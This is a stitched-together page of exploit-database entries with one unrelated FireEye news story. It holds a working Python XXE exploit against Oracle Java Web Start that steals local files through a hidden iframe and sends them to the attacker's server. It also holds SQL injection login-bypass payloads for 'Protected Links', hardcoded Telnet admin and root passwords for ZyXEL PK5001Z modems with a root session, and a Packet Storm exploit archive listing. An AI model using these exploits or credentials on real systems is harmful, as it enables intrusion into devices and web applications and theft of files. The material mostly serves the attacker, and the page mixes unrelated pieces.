tap0: vmnet8 (+) starting xxe server... (+) have someone with Java SE installed visit: http://172.16.175.1:9090/ (!) firing webstart... (!) downloading jnlp... (!) downloading si.xml... (+) stolen: Please%20refer%20to%20http://java.com/licensereadme ^C(+) shutting down the web server saturn:~ mr_me$ """ import sys import socket import fcntl import struct from random import choice from string import lowercase from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler try: import netifaces as ni except: print "(-) try 'pip install netifaces'" sys.exit(1) class xxe(BaseHTTPRequestHandler): # stfu def log_message(self, format, *args): return def do_GET(self): if "leaked" in self.path: print "(+) stolen: %s" % self.path.split("?")[1] self.send_response(200) self.end_headers() elif self.path == "/": print "(!) firing webstart..." self.send_response(200) self.end_headers() message = """ <html> <body> <iframe src="jnlp://%s:9090/%s" style="width:0;height:0;border:0; border:none;"></iframe> </body> </html> """ % (ip, path) self.wfile.write(message) self.wfile.write('\n') elif "si.xml" in self.path: print "(!) downloading si.xml..." self.send_response(200) self.end_headers() message = """ <!ENTITY %% data SYSTEM "file:///%s"> <!ENTITY %% param1 "<!ENTITY &#x25; exfil SYSTEM 'http://%s:9090/leaked?%%data;'>"> """ % (file, ip) self.wfile.write(message) self.wfile.write('\n') elif path in self.path: print "(!) downloading jnlp..." self.send_response(200) self.end_headers() message = """ <?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY %% sp SYSTEM "http://%s:9090/si.xml"> %%sp; %%param1; %%exfil; ]> """ % ip self.wfile.write(message) self.wfile.write('\n') return def banner(): return """\n\tOracle Java Web Start JNLP XML External Entity Processing Information Disclosure Vulnerability\n\tmr_me 2017\n""" if __name__ == '__main__': print banner() if len(sys.argv) != 2: print "(+) usage: %s <file>" % sys.argv[0] print "(+) eg: %s 'C:/Program Files/Java/jre1.8.0_131/README.txt'" % sys.argv[0] sys.exit(1) file = sys.argv[1] # randomize incase we change payloads and browser caches path = "".join(choice(lowercase) for i in range(10)) path += ".jnlp" # interfaces ints = "" for i in ni.interfaces(): ints += "%s, " % i interface = raw_input("(+) select your interface: %s: " % ints[:-2]) # get the ip from the interface try: ip = ni.ifaddresses(interface)[2][0]['addr'] except: print "(-) no ip address associated with that interface!" sys.exit(1) print "jnlp://%s:9090/%s" % (ip, path) try: server = HTTPServer(('0.0.0.0', 9090), xxe) print '(+) starting xxe server...' print '(+) have someone with Java SE installed visit: http://%s:9090/' % ip server.serve_forever() except KeyboardInterrupt: print '(+) shutting down the web server' server.socket.close() Source

Protected Links suffers from a remote SQL injection vulnerability. <!-- # # # # # # Exploit Title: Protected Links - Expiring Download Links - SQL Injection # Dork: N/A # Date: 30.10.2017 # Vendor Homepage: http://sixthlife.net/ # Software Link: https://codecanyon.net/item/protected-links-expiring-download-links/2556861 # Demo: http://protectedlinks.net/demo/ # Version: N/A # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: CVE-2017-15977 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/admin # # User: 'or 1=1 or ''=' Pass: anything # # Etc.. # # # # # --> <form name="login" method="post" action="http://localhost/[PATH]/index.php"> <div id="login"> <table width="200" border="0"> <tr> <td height="45"><p>Username</p></td> <td><label for="textfield"></label> <input type="text" name="username" id="textfield" value="' UNION ALL SELECT 1,CONCAT(VERSiON(),0x494853414e2053454e43414e),3,4,CONCAT(0x494853414e2053454e43414e)-- Ver Ayari"/></td> </tr> <tr> <td height="45">Password</td> <td><label for="textfield"></label> <input type="password" name="password" id="textfield" value="Ver Ayari"/></td> </tr> </table> </div> <input type="submit" name="submit" value="LOGIN" /> </form> Source

The person who attacked the personal online accounts of a FireEye employee several months ago was arrested and taken into custody Thursday by international law enforcement, FireEye said Thursday. The Milpitas, Calif.-based company worked with law enforcement and spent hundreds of hours investigating a hacker's July claim that he had breached FireEye's corporate network, according to CEO Kevin Mandia. But these attackers rarely, if ever, get caught, Mandia said. FireEye announced in August that the hacker didn't breach, compromise or access the company's corporate network, despite multiple failed attempts to do so. Instead, the attacker used credentials for the victim's social media and email accounts exposed in publicly-disclosed third-party breaches to access the employee's personal online accounts. The attacker publicly released three FireEye corporate documents obtained from the victim's personal online accounts, according to an Aug. 7 blog post from FireEye Chief Security Officer Steven Booth. Two customer names were identified in the employee's personal email and disclosed by the hacker. Customers or prospects concerned about the attack were able to sit down with Mandia or FireEye's CISO and talk through what happened, according to CFO and Chief Accounting Officer Frank Verdecanna. Although it took some time to get through those discussions, Verdecanna told CRN that he doesn't believe the incident had a significantly negative impact on FireEye's performance in the quarter. At the same time, though, Mandia told CRN that FireEye had to sink a "tremendous" amount of time and effort into investigating the hacker's claims. That efforts a lot of direct, real costs on the company, according to Mandia. All told, Verdecanna said the negative impact of the attack was primarily centered around the time it took FireEye to get to the bottom of what happened and convincing customers that the company wasn't breached. FireEye's sales for the quarter ended Sept. 30 climbed to $189.6 million, up 1.7 percent from $186.4 million the year prior. That edged out Seeking Alpha projections of $186.2 million. The company recorded a net loss of $72.9 million, or $0.41 per share, improved from a net loss of $123.4 million, or $0.75 per share, last year. On a non-GAAP basis, net income came in at $6.5 million, or $0.04 per share, better than a net loss of $29.4 million, or $0.18 per share, the year before. This beat Seeking Alpha projections of a net loss of $0.07 per share. FireEye's stock fell $1.99 (12.16%) to $14.38 in after-hours trading. Earnings were released after the market closed Wednesday. For the coming quarter, FireEye expects to break even or report a net loss of as much as $0.03 a share on sales of between $190 million and $196 million. Analysts had been expecting a net loss of $0.01 on earnings of $195.9 million, according to Seeking Alpha. Source: crn.com

# Exploit Title: ZyXEL PK5001Z Modem - CenturyLink Hardcoded admin and root Telnet Password. # Google Dork: n/a # Date: 2017-10-31 # Exploit Author: Matthew Sheimo # Vendor Homepage: https://www.zyxel.com/ # Software Link: n/a # Version: PK5001Z 2.6.20.19 # Tested on: Linux # About: ZyXEL PK5001Z Modem is used by Century Link a global communications and IT services company focused on connecting its customers to the power of the digital world. # Linked CVE's: CVE-2016-10401 Hardcoded password for ZyXEL PK5001Z Modem, login with the following credentials via Telnet username: admin password: CenturyL1nk Escalate to root with 'su' and this password. password: zyad5001 [root:/]# telnet 192.168.0.1 Trying 192.168.0.1... Connected to 192.168.0.1. Escape character is '^]'. PK5001Z login: admin Password: CenturyL1nk $ whoami admin_404A03Tel $ su Password: zyad5001 # whoami root # uname -a Linux PK5001Z 2.6.20.19 #54 Wed Oct 14 11:17:48 CST 2015 mips unknown # cat /etc/zyfwinfo Vendor Name: ZyXEL Communications Corp. Source: https://www.exploit-db.com/exploits/43105/

This archive contains all of the 162 exploits added to Packet Storm in October, 2017. Contents: 3cx-traversal.txt lansweeper60063-xss.txt apachesolr701-xxe.txt lansweeper-xxe.txt apachetomcat-bypassexec.txt linux4140rc4-escalate.txt argosoftmms1002-dos.txt linuxkernel414rc3-dos.txt asxmp3converter-overflow.txt mitrastar-escalate.txt asxmpe3137-overflow.txt mozff-dos.txt atomcat-uploadexec.txt msiisurlscan-bypass.txt ayukovnftp-overflow.txt msoffice2007word-disclose.txt binutils229-overflow.tgz msofficegroove-bypassexec.txt bypassuac_injection_winsxs.rb.txt MS-WINDOWS-GAME-DEFINITION-FILE-MAKER-v6.3.9600-XML-EXTERNAL-ENTITY.txt careerportal10-sql.txt muracms-ssrfxxe.txt clipbucket283-exec.txt netgear_dgn1000_setup_unauth_exec.rb.txt clipshare70-sql.txt netgearreadynas14316-exec.txt cms-harcodedsql.txt npmv-password.txt cometchat-lfi.txt ntlm-weakness.txt ctvdc141-download.txt octobercms10425-xss.txt CVE-2017-14089-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-REMOTE-MEMORY-CORRUPTION.txt onlineexamtest-sql.txt CVE-2017-15012.py.txt orientdb_exec.rb.txt CVE-2017-15013.py.txt osticket1101-shell.txt CVE-2017-15014.py.txt phpinventory-upload.txt CVE-2017-15276.py.txt phpmelody261-sql.txt CVE-2017-5223.txt phpmelody-sqlxss.pdf dameware12-exec.txt phpmvs102-sql.txt dbe-overflow.txt phpmyfaq298title-xss.txt DC-2017-01-001.txt piaandroid-dos.txt DC-2017-01-013.txt polycom_hdx_auth_bypass.rb.txt DC-2017-09-001_Magento_CSRF_Stored_Cross_Site_Scripting.pdf postgreswin-dllhijack.txt DC-2017-09-002_Magento_CSRF_Stored_Cross_Site_Scripting.pdf progeamovicon-unquoted.txt dnsmask-underflow.txt pyrobatchftp317-overflow.txt dnsmasq2byte-overflow.txt quickcms64-sql.txt dnsmasq-disclose.txt R7-2017-22.txt dnsmasqheap-overflow.txt rancher_server.rb.txt dnsmasqlackoffree-dos.txt RCESEC-2017-001.txt dnsmasqsb-overflow.txt RCESEC-2017-002.txt dreambox200be-xss.txt remlmps10-sql.txt duckietvcms115-lfi.txt SA-20171016-0.txt e2openwebif-exec.txt SA-20171017-0.txt easympegtodvd-overflow.py.txt SA-20171018-0.txt epesi182-xss.txt SA-20171018-1.txt ersdatasystem-deserialize.txt sbe10028-overflow.txt esiclivrecms-sqlxss.txt sbe10116-overflow.txt Excel_PoC.zip smartbearsoapui-exec.txt fiberhomean550604f-exec.txt smarterstats1136347-xss.txt fsamazonclone-sql.txt spidercontrol-mismanagement.txt fsbookstore-sql.txt subarufobrob-keyfob.zip fscareclone-sql.txt sync_breeze_enterprise.rb.txt fscarrental-sql.txt tizenstudio13-overflow.txt fscrowdfunding-sql.txt tomcat_jsp_upload_bypass.rb.txt fsebayclone-sql.txt tplink-exec.txt fsexpediaclone-sql.txt trendmicro_imsva_widget_exec.rb.txt fsfds-sql.txt trendmicro_officescan_widget_exec.rb.txt fsfreelancerclone-sql.txt typo3restler-disclose.txt fsgrouponclone-sql.txt ucopiawa-exec.txt fsindiamartclone-sql.txt ueb9_api_storage.rb.txt fslyndaclone-sql.txt ueb9_bpserverd.rb.txt fsmonsterclone-sql.txt unitrendsueb91-bypassexec.txt fsolxclone-sql.txt unitrendsueb91-escalate.txt fsrealtorclone-sql.txt unitrendsueb91-exec.txt fsshutterstockclone-sql.txt vastalitechagent-sql.txt fsthumbtackclone-sql.txt vxsearchent10112-overflow.txt fstrademeclone-sql.txt watchdogdam-null.txt GS20171004140626.txt WEBMIN-v1.850-REMOTE-COMMAND-EXECUTION.txt GS20171014213118.tgz websitebroker-sql.txt GS20171014213228.txt wildpool-overflow.tgz GS20171014213716.txt wp482-failedexpiry.txt GS20171014213919.txt wpcarparkbooking-sql.txt GS20171017140123.tgz wpimprs22-xss.txt GS20171019143149.tgz wppolls124-sql.txt hashicorp4024-escalate.txt wppootlebutton111-xss.txt hbgkdvr300-bypass.txt wppopcash10-xss.txt hitmanpro-overflow.tgz wpsmushimage-traversal.txt ibmnotesencodeuri-dos.rb.txt wptrega100-xss.txt janktekjtc200-xsrfauth.txt wpulf152-xss.txt kaltura-exec.txt wpupc4224-inject.txt keystonejs400beta5-inject.txt X41-2017-008.txt keystonejs400beta5-xss.txt X41-2017-010.txt KL-001-2017-017.txt xcart-inject.pdf KL-001-2017-018.txt zktimews20-insecure.txt KL-001-2017-019.txt zktimews20-xsrf.txt KL-001-2017-020.txt zomatoclone-sql.txt KL-001-2017-021.txt ZSL-2017-5439.txt Download: 1710-exploits.tgz (1.9 MB) Source